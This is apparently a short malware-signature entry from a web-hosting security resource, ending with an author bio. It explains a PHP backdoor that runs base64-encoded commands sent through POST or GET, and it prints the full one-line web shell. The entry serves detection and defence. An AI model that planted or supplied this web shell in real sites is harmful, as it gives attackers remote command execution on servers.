False Positive Probability: medium to low
This Code executes code that was sent by _POST, _GET etc. and crypted by base64 encoding. Attackers can use this script to execute any command they like.
<?php eval(base64_decode($_POST['hello'])); ?>
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.